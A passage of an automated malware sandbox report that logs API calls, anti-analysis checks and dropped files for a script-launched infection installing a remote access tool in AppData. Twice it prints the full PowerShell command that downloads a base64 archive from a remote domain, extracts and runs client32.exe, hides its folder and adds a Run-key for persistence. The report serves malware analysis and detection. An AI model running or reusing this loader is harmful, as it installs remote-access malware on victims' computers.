Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 10_2_11139ED0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 10_2_110C1020
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113380 IsIconic,GetTickCount, 10_2_11113380
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 10_2_110CB750
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 10_2_111236E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 10_2_11025A90
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 10_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 10_2_11113FA0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId, 10_2_11025EE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 10_2_1115BEE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 10_2_110241A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 10_2_11024880
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA891F0 10_2_6CA891F0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110B86C0 Sleep,ExitProcess, 10_2_110B86C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1635
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8251
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Window / User API: threadDelayed 393
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Window / User API: threadDelayed 8099
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe API coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632 Thread sleep time: -62000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 4020 Thread sleep time: -39300s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632 Thread sleep time: -2024750s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CA93226h 10_2_6CA93130
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 10_2_111273E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102DD21
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 10_2_1110BD70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 10_2_110663B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 10_2_1106ABD0
Source: HTCTL32.DLL.8.dr Binary or memory string: VMware
Source: HTCTL32.DLL.8.dr Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.8.dr Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: client32.exe, 0000000A.00000003.1539891812.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523977080.0000000005992000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526874385.0000000005990000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnD
Source: wscript.exe, 00000000.00000003.1346975876.000001FC57262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526350208.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1539453940.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523563518.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2491283544.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: HTCTL32.DLL.8.dr Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.8.dr Binary or memory string: VMWare
Source: powershell.exe, 00000008.00000002.1840183751.0000026C752E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000008.00000002.1840183751.0000026C751C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_11162BB7
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA, 10_2_110B7F30
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 10_2_11029BB0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 10_2_1117D104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle, 10_2_110934A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter, 10_2_11031780
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_1116EC49

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 77.83.199.112 443
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError, 10_2_110F4990
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113190 GetKeyState,DeviceIoControl,keybd_event, 10_2_11113190
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $vwkxivyiuk='https://ggoryo.com/trade/da.php?9800';$qbosaxlnlpu=(new-object system.net.webclient).downloadstring($vwkxivyiuk);$zrpu=[system.convert]::frombase64string($qbosaxlnlpu);$asd = get-random -minimum -5 -maximum 12; $jdkprjil=[system.environment]::getfolderpath('applicationdata')+'\eqmiufuuucw'+$asd;if (!(test-path $jdkprjil -pathtype container)) { new-item -path $jdkprjil -itemtype directory };$p=join-path $jdkprjil 'cxcc.zip';[system.io.file]::writeallbytes($p,$zrpu);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$jdkprjil)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $jdkprjil 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $jdkprjil -force; $fd.attributes='hidden';$s=$jdkprjil+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='diwfe';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent, 10_2_1109E5B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid, 10_2_1109ED30
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr Binary or memory string: Progman
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 10_2_11174898
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 10_2_11174B29
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 10_2_11174BCC
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: GetLocaleInfoA, 10_2_1116C24E
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 10_2_11174796
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 10_2_111746A1
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 10_2_1117483D
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 10_2_11174B90
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 10_2_11174A69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree, 10_2_110F37A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary, 10_2_11134830
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary, 10_2_11147160
